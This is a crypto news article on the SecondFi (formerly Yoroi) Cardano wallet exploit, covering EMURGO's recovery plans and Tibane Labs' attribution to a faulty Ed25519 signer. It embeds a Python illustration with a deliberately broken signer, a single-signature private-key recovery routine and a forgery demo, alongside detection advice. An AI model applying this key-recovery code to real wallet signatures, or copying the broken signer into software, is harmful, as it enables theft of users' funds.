SecondFi maps recovery path after $2.4 million Cardano wallet exploit, aims to return funds within two weeks

Quick Take
- EMURGO said on Saturday it has identified a recovery path for users of its SecondFi Cardano wallet and aims to begin returning assets in about two weeks.
- An exploit drained roughly 16 million ADA, about $2.4 million, from 374 addresses between June 21 and 23 through a flaw in SecondFi’s own wallet-generation software.
- A report from Tibane Labs, a firm building its own wallet, blames an unaudited third-party SDK that it says replaced EMURGO’s audited signing code on June 8 and left a single signature able to leak a user’s private key.
EMURGO, a co-founding entity of the Cardano blockchain, said on Saturday it had found a way to return assets to users of its SecondFi wallet, days after an exploit drained about $2.4 million worth of ADA.
In a statement posted to X, EMURGO CEO Phillip Pon said the company had completed its forensic investigation, validated wallet balances, and identified what he called "a clear recovery solution." He put the timeline at roughly two weeks, with one week to build the recovery mechanism and a second to test it before any returns begin.
Pon told affected users not to move funds or take steps outside SecondFi's official guidance, saying the recovery is being built around the current state of the compromised wallets. He added that no step requiring user participation had started, and that SecondFi would never ask for private keys, seed phrases, or wallet access.
The Saturday post is the first time the company has attached a concrete timeline to the recovery. It has not yet published a full technical postmortem, given per-user recovery amounts, or detailed how users will claim funds.
$2.4 million taken from 374 addresses
SecondFi, the wallet EMURGO rebranded from Yoroi in April, has described four wallet-draining events between June 21 and 23. Three were carried out by external attackers, who took about 16 million ADA, roughly $2.4 million at the time, from 374 addresses.
In the fourth event, SecondFi said it moved about 129 million ADA to an independent third-party custodian as an emergency measure to keep the funds away from the attackers. It said an external accounting firm has been engaged to verify those holdings, and that affected users can file claims through its support site.
The company said it identified two attacker wallets, one of which drained 171 wallets and the other 203, and that about 4 million ADA tied to the theft sits in a flagged collection address under monitoring. It said it has notified law enforcement.
A competing forensic account
SecondFi has blamed an address-level flaw in its wallet-generation software that exposed users' private keys. It has warned that restoring an affected recovery phrase in another wallet does not remove the risk, because the exposure is triggered when a compromised address signs a transaction.
A more specific account has come from Tibane Labs, which published a forensic report on the incident on Saturday. Tibane Labs is developing its own wallet, and its findings track public claims made earlier on X by Mark Karpelès, the former Mt. Gox chief executive who is part of that team, meaning its analysis comes from a competing party.
Tibane said the breach was not due to nonce reuse, the failure mode that broke the PlayStation 3's signing key in 2010, but to an Ed25519 signing error. According to the report, the wallet's signer dropped the per-key secret prefix that the standard hashes together with the message to derive each signature's nonce, so a value meant to be secret was computed from the public transaction data alone. That left it derivable by anyone and made a single signature enough to reconstruct the private key, with no second transaction or statistical attack required.
Tibane said the vulnerable signer was an experimental, unaudited SDK called trantor, published to npm by an independent developer, that replaced EMURGO's previously shipped and audited build on June 8. The first compromised signature appears onchain that same day, according to the report.
Tibane said the underlying cryptographic library was sound and that the fault lay in how the wallet wired the key into it, leaving the secret nonce material unset. It said it decompiled the signed Android build, matched it to the trantor code, and recovered victim private keys from historical signatures to confirm the mechanism. The Block could not independently verify those findings.
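To make the reported mechanism concrete, the following is an added Python illustration, not code from SecondFi, trantor or Tibane. It uses a pure-Python Ed25519 in the style of the reference implementation and models the wiring fault as a library signing core that takes the clamped scalar and the 32-byte nonce prefix separately, with a wallet layer that passes an empty prefix; the names (`sign_core`, `wallet_sign_broken`, `recover_scalar`, `demo`) and that split are assumptions for the example, and the report says only that the nonce material was left unset (a zero-filled prefix would be attacked the same way, since either is attacker-computable). The sample transaction bytes are constructed.

```python
# Added illustration of the dropped-prefix Ed25519 fault; not SecondFi, trantor or Tibane code.
import hashlib
import os

q = 2**255 - 19                                       # field prime
l = 2**252 + 27742317777372353535851937790883648493   # base point order
d = -121665 * pow(121666, q - 2, q) % q               # twisted Edwards constant
SQRT_M1 = pow(2, (q - 1) // 4, q)                     # sqrt(-1) mod q

def H(m):
    return hashlib.sha512(m).digest()

def Hint(m):
    return int.from_bytes(H(m), "little")

def xrecover(y):
    """Return the even x with x^2 = (y^2 - 1) / (d y^2 + 1) mod q."""
    xx = (y * y - 1) * pow(d * y * y + 1, q - 2, q) % q
    x = pow(xx, (q + 3) // 8, q)
    if (x * x - xx) % q:
        x = x * SQRT_M1 % q
    return q - x if x & 1 else x

def edwards(P, Q):
    """Affine point addition on the twisted Edwards curve."""
    x1, y1 = P
    x2, y2 = Q
    t = d * x1 * x2 * y1 * y2
    return ((x1 * y2 + x2 * y1) * pow(1 + t, q - 2, q) % q,
            (y1 * y2 + x1 * x2) * pow(1 - t, q - 2, q) % q)

def scalarmult(P, e):
    Q = (0, 1)                                        # neutral element
    while e:
        if e & 1:
            Q = edwards(Q, P)
        P = edwards(P, P)
        e >>= 1
    return Q

By = 4 * pow(5, q - 2, q) % q
B = (xrecover(By), By)                                # standard base point

def encodepoint(P):
    x, y = P
    s = bytearray(y.to_bytes(32, "little"))
    s[31] |= (x & 1) << 7                             # sign of x in the top bit
    return bytes(s)

def decodepoint(s):
    y = int.from_bytes(s, "little") & ((1 << 255) - 1)
    x = xrecover(y)
    return (q - x, y) if (x & 1) != (s[31] >> 7) else (x, y)

def expand_seed(seed):
    """RFC 8032 key expansion: clamped scalar a and the secret 32-byte nonce prefix."""
    h = H(seed)
    a = int.from_bytes(h[:32], "little") & ((1 << 254) - 8) | (1 << 254)
    return a, h[32:]

def public_key(a):
    return encodepoint(scalarmult(B, a))

def sign_core(a, prefix, pk, m):
    """Library signing core (assumed shape): r = H(prefix || m), S = r + H(R||A||m)*a mod l."""
    r = Hint(prefix + m) % l
    R = encodepoint(scalarmult(B, r))
    return R + ((r + Hint(R + pk + m) * a) % l).to_bytes(32, "little")

def verify(sig, pk, m):
    R, S = decodepoint(sig[:32]), int.from_bytes(sig[32:], "little")
    h = Hint(sig[:32] + pk + m) % l
    return scalarmult(B, S) == edwards(R, scalarmult(decodepoint(pk), h))

def wallet_sign_correct(seed, m):
    a, prefix = expand_seed(seed)
    return sign_core(a, prefix, public_key(a), m)

def wallet_sign_broken(seed, m):
    # Modelled wiring fault (assumption): the prefix is never passed, so r = H(m) is public data.
    a, _ = expand_seed(seed)
    return sign_core(a, b"", public_key(a), m)

def recover_scalar(sig, pk, m):
    """Attacker side: recompute r from the public message, solve S = r + h*a for a mod l."""
    R, S = sig[:32], int.from_bytes(sig[32:], "little")
    r, h = Hint(m) % l, Hint(R + pk + m) % l
    return (S - r) * pow(h, -1, l) % l

def demo(seed=None):
    seed = seed or os.urandom(32)
    pk = public_key(expand_seed(seed)[0])
    tx = b"constructed sample transaction bytes"        # constructed input
    forged_tx = b"attacker-chosen transaction"          # constructed input
    broken = wallet_sign_broken(seed, tx)
    a_rec = recover_scalar(broken, pk, tx)            # one signature suffices
    forged = sign_core(a_rec, os.urandom(32), pk, forged_tx)
    good = wallet_sign_correct(seed, tx)
    return {
        "broken_sig_valid": verify(broken, pk, tx),   # the chain accepts it like any other
        "key_recovered": public_key(a_rec) == pk,
        "forgery_valid": verify(forged, pk, forged_tx),
        "correct_sig_valid": verify(good, pk, tx),
        "correct_sig_leaks": public_key(recover_scalar(good, pk, tx)) == pk,
    }
```

`demo()` shows why the fault is invisible to the network and to ordinary sign-then-verify testing: the leaky signature verifies exactly like a correct one, and the scalar is recovered modulo the group order, which is all an attacker needs to forge. In this model every key produces the same `R` for the same message, since `r` no longer depends on the key, so a scan for identical `R` values under different public keys, or a known-answer test against the RFC 8032 vectors, is the kind of check that would have flagged the build before it shipped.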
EMURGO has not published a technical postmortem and has not publicly addressed Tibane's attribution to a third-party SDK. Separately, security researcher Taylor Monahan said this week that SecondFi "rolled their own crypto" and that the software was closed source and unaudited.
A founding entity under scrutiny
Yoroi served as Cardano's main lightweight wallet for years before the SecondFi rebrand, and EMURGO is one of the network's three founding organizations. Tibane framed the episode less as a coding error than a governance failure, arguing that a founding entity shipped unaudited code to production in place of an audited build, without an independent review or a test that would have caught the flaw.
The exploit comes as ADA trades near multi-year lows. It also follows a separate nonce-related failure earlier this year: The Block reported that the $280 million Drift Protocol exploit turned on the misuse of Solana "durable nonces," though that breach was traced to social engineering rather than flawed wallet code.
By Tibane's measure, only signatures made from June 8 onward are exposed, and transactions signed before that date used the audited implementation.
Disclaimer: The Block is an independent media outlet that delivers news, research, and data. As of November 2023, Foresight Ventures is a majority investor of The Block. Foresight Ventures invests in other companies in the crypto space. Crypto exchange Bitget is an anchor LP for Foresight Ventures. The Block continues to operate independently to deliver objective, impactful, and timely information about the crypto industry. Here are our current financial disclosures.
© 2026 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.

